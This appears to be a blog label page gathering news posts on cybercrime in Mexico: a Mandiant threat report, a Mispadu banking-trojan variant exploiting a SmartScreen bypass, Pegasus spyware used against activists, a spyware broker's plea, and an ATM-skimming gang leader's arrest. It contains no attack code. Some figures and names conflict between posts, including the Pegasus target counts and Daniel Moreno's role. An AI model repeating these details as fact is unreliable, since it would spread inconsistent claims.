Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Mexico. Show all posts

Here's How Criminals Are Targeting Users and Enterprises in Mexico

 

A recent Mandiant report highlighted the increasing cyber threats that Mexico is facing, including a sophisticated blend of domestic and global cybercrime that targets both individuals and businesses. 

Mexico's economy, ranked 12th largest in the world, makes it an appealing target for both financially driven hackers and cyber criminals from countries like North Korea, China, and Russia.

Since 2020, cyber espionage groups from over ten nations have been identified attempting to breach Mexican organisations. Among these, attackers affiliated with the People's Republic of China (PRC), North Korea, and Russia have been the most active, with China accounting for one-third of government-sponsored phishing activity.

Chinese actors are focussing specifically on news, education, and government organisations in Mexico; this is consistent with similar targeting strategies observed in regions where China has made large investments. 

Since the start of the war in Ukraine, North Korean outfits have focused on financial technology and cryptocurrency firms, while Russian cyber espionage activities have fallen substantially as resources have been diverted to other areas. The use of commercial spyware in Mexico is also highlighted in the report, with politicians, human rights advocates, and journalists being among the targets.

These tools are frequently sold to governments or attackers and are used to detect and exploit vulnerabilities in consumer devices. While spyware attacks only affect a few people at a time, they have significant implications for Mexico's press freedom and political integrity. 

Mandiant's report highlights a significant increase in ransomware and extortion operations in Mexico. From January 2023 to July 2024, Mexico ranked second in Latin America in terms of data leak site (DLS) listings following ransomware attacks, trailing only Brazil. LockBit, ALPHV, and 8BASE have been the most active in Mexico, concentrating on industries including manufacturing, technology, and financial services.

Threats from financial malware distribution efforts persist in Mexico, as attackers use lures related to taxes and finance to trick unsuspecting victims into downloading malicious software. UNC4984 and other groups have been seen distributing malware to Mexican banks via spoofed Mexican government websites, including the Mexican Tax Administration Service (SAT).

New Variant of Banking Trojan Discovered Targeting Mexico

In a recent discovery, cybersecurity researchers from Palo Alto Networks Unit 42 have uncovered a new variant of the stealthy banking Trojan known as Mispadu Stealer. This infostealer is specifically designed to target regions and URLs associated with Mexico, posing a significant threat to users in the region. 

The researchers stumbled upon this new variant while conducting investigations into attacks exploiting the Windows SmartScreen bypass vulnerability CVE-2023-36025. This vulnerability has been a prime target for cybercriminals looking to bypass security measures and infiltrate systems. However, it was addressed by Microsoft in November 2023. 

How You Are Being Attacked?

Essentially, attackers exploit a flaw in Windows SmartScreen, a security feature designed to warn users about potentially harmful downloads. By crafting internet shortcut files (.URL) or hyperlinks that point to malicious content, they can evade SmartScreen's defenses. This evasion tactic hinges on including a parameter that points to a network share rather than a standard URL. Inside the manipulated.URL file is a link leading to a network share controlled by the threat actor, housing a dangerous executable file. 

Since August 2022, Mispadu has been behind numerous spam campaigns, resulting in the theft of over 90,000 bank account credentials. This revelation highlights the significant threat Mispadu poses to the financial security of users across Latin America. However, Mispadu is just one member of a larger family of LATAM banking malware. 

Among its notorious counterparts is Grandoreiro, a formidable threat that has plagued users in the region. Recent efforts by law enforcement authorities in Brazil have resulted in the dismantling of Grandoreiro, offering some relief to users. 

Despite this success, cybersecurity experts warn that the danger from Mispadu and similar malware persists. Users are urged to remain vigilant when dealing with unsolicited emails and to bolster their defenses with robust security measures. By staying informed and implementing proactive strategies, users can better protect themselves against potential attacks.

Report: Mexico Continued to Utilize Spyware Against Activists

 

Despite President Andrés Manuel López Obrador's pledge to end such practices, the Mexican government or army is said to have continued to use spyware designed to hack into activists' cellphones. 

As per press freedom groups, they discovered evidence of recent attempts to use the Israeli spyware programme Pegasus against activists investigating human rights violations by the Mexican army. A forensic investigation by the University of Toronto group Citizen Lab confirmed the Pegasus infection. 

The targets included rights activist, Raymundo Ramos, according to a report by the press freedom group Article 19, The Network for the Defense of Digital Rights, and Mexican media organisations. Ramos has spent years documenting military and police abuses, including multiple killings, in Nuevo Laredo, a drug cartel-dominated border city. In 2020, Ramos' cellphone was apparently infected with Pesgasus spyware.

“They do not like us documenting these types of cases, for them to be made public and have criminal complaints filed,” Ramos said.

Other victims in 2019 and 2020 included journalist and author Ricardo Raphael and an unnamed journalist for the online media outlet Animal Politico. 

According to Daniel Moreno, director of Animal Politico, "if the president didn't know, that is very serious because it means the army was spying on him without his consent." If the president was aware, it would be extremely serious."

López Obrador took office in December 2018 with the promise of ending government spying. The president claimed that as an opposition leader, he had been subjected to government surveillance for decades. Lopez Obrador said in 2019, in response to questions about the use of Pegasus, “We are not involved in that. Here we have decided not to go after anybody. Before, when we were in the opposition, we were spied on.”

According to the report, the Mexican army requested price quotes for surveillance programmes from companies involved in the distribution of Pegasus, which the company claims is only sold to governments. The hacker group Guacamaya discovered army documents containing requests for price quotes from 2020, 2021, and 2022.

Because of the nature of their work and the timing of the espionage, the victims of the spyware attacks assumed the military was to blame. Leopoldo Maldonado, the director of Article 19, stated, “All of this indicates two possible scenarios: the first, that the president lied to the people of Mexico. The second is that the armed forces are spying behind the president’s back, disobeying the orders of their commander in chief.”

When reached for comment, a spokesman for Mexico's Defense Department stated that there was no immediate response to the allegations. In 2021, a Mexican businessman was arrested on suspicion of spying on a journalist with the Pegasus spyware, but the Israeli spyware firm NSO Group distanced itself from him. In Mexico, the businessman has long been described as an employee of a company that acted as an intermediary in spyware purchases.

According to López Obrador's top security official, two previous administrations spent $61 million on Pegasus spyware. The NSO Group has been linked to government surveillance of political opponents and journalists all over the world. 

"NSO's technologies are only sold to vetted and approved government entities," as per the company.

Mexico had the largest list — approximately 15,000 phone numbers — of more than 50,000 reportedly selected for potential surveillance by NSO clients.

López Obrador has relied on the military more and given it more responsibilities than any of his predecessors, from building infrastructure to overseeing seaports and airports. This has sparked concern that the Mexican army, which has traditionally avoided politics, is becoming a force unto itself, with little oversight or transparency.

Malware Seller Faces Charges for Peddling WhatsApp Espionage Tools

 

The US Justice Department (DoJ) reported a Mexican businessman named Carlos Guerrero admitted guilt in federal court for peddling spyware/hacking tools to clients in the United States and Mexico.

Authorities accused Guerrero of facilitating the sale of monitoring and surveillance technologies to both Mexican government users and private customers for commercial and personal purposes. Guerrero "knowingly arranged" for a Mexican mayor to obtain access to a political rival's email and social media accounts, according to the investigators. Guerrero also utilized the technology to listen in on the phone calls of a rival from the United States who had been in Southern California and Mexico at the time. 

Guerrero is also suspected of assisting a Mexican mayor in gaining unlawful access to his rival's iCloud, Hotmail, as well as Twitter pages, according to the Department of Justice's news release. A sales representative's phone and email data were hacked in another case, so he had to pay $25,000 to regain the information. The accused also utilized the gadgets to listen more into his rival's phone calls in Mexico and South California. Guerrero's company, Elite by Carga, imported surveillance technology and espionage tools from unknown Israeli, Italian, and other companies. 

Guerrero operated as a broker for an undisclosed Italian business, referred to only as Company A in the accusation, which offered bugging devices and tracking tools between 2014 and 2015. The organization is thought to be Hacking Team, a bankrupt Milan-based maker of offensive infiltration tools which was also breached in 2015 and had leaked emails leaked online, including a cache of Guerrero-related messages. 

Pegasus, strong mobile spyware created by Israeli corporation NSO Group which can acquire near-complete permissions on a target's smartphone, is among the most prominent and reported keylogging software used in Mexico. Over the last two decades, Mexico has spent $61 million on contracts, primarily targeting journalists, activists, and human rights defenders. According to a leaked list of phone numbers suspected to be NSO surveillance targets, Mexico has the most targets — around 700 phones — of any country on the list, which NSO has consistently denied.

Guerrero's information director Daniel Moreno, who is often mentioned in the hacking team's emails, is scheduled to file a similar pleading in the coming weeks.

Florian Tudor – The Shark Arrested in Mexico

 

Florian Tudor "The Shark," alleged mastermind of the renowned ATM skimming gang, has been detained in Mexico City on Thursday 27th May 2021 following a Romanian court's arrest demand and had gathered hundreds of millions of dollars from bank accounts of tourists visiting Mexico for the past eight years. 

Tudor, from Craiova, Romania, traveled to Mexico to establish Intacash a Top Life Servicios, an ATM services company that operated a network of comparatively new ATMs in Mexico. 

On Thursday, Florian Tudor, "The Shark" was arrested while he was taken into custody by Mexican Attorney General officers. As shown in a video published by media organizations, the situation broke out in wrestling, screaming, and officials bringing Tudor out of the house by his arms and legs. 

The federal law enforcement agency in Mexico alleged that members of Tudor tried to attack a policeman before they were arrested. 

Robert Bica, a Bucharest lawyer of Tudor, verified the Romanian newspaper Libertatea of his detention. Now, in the following two or three weeks, a Mexican judge will decide on his deportation. 

An insider from Romania's organized crime prosecution reported to the same publication that the United States authorities played an important role in investigating Tudor, who is said to have targeted thousands of US tourists in Mexico and is considered responsible for approximately 12% of global skimming. 

Tudor as well as his own Riviera Maya Gang are the most recent twist in a long history of criminality by law enforcement officers and foreign journalists. 

The gang, entitled by Organized Crime and Corruption Reporting Project -OCCRP, has hacked over 100 ATMs around Mexico – Cancun, Tulum, Cozumel, and elsewhere to discreetly raise $1.2 billion from victim bank accounts, as revealed by OCCRP. The system relied in part on Bluetooth skimmers, which bank staff paid for their services implanted in ATMs. 

Last year Tudor was arrested on charges of attempted murder, blackmail, and the development of an organized crime network that is specialized in human trafficking, by a Romanian court following his conviction in absentia. 

Tudor has also been investigated by the Bucharest authorities in the matter of the trafficking of thousands of Romanian of Roma origin in Mexico and the United States where they are reportedly taken to steal, beg and claim refuge for prosecution on the grounds of fleeing Romanian racial persecution. 

Over time, Mexican governments have examined Tudor and his firms' bank accounts and researchers believe that Tudor and his friends have offered protection and hushed money over the years for various Mexican politicians and officials. The Leader of the Green Party in Mexico came down in February when it became apparent that he was receiving cash from Tudor.

The authorities of Mexico have arrested Tudor for the second time. Tudor and his subordinates were arrested in April 2019 for illegally owning guns. The arrest took place only months after Tudor allegedly instructed a former bodyguard to assist US officials in bringing the organization down on profitable skimming practices.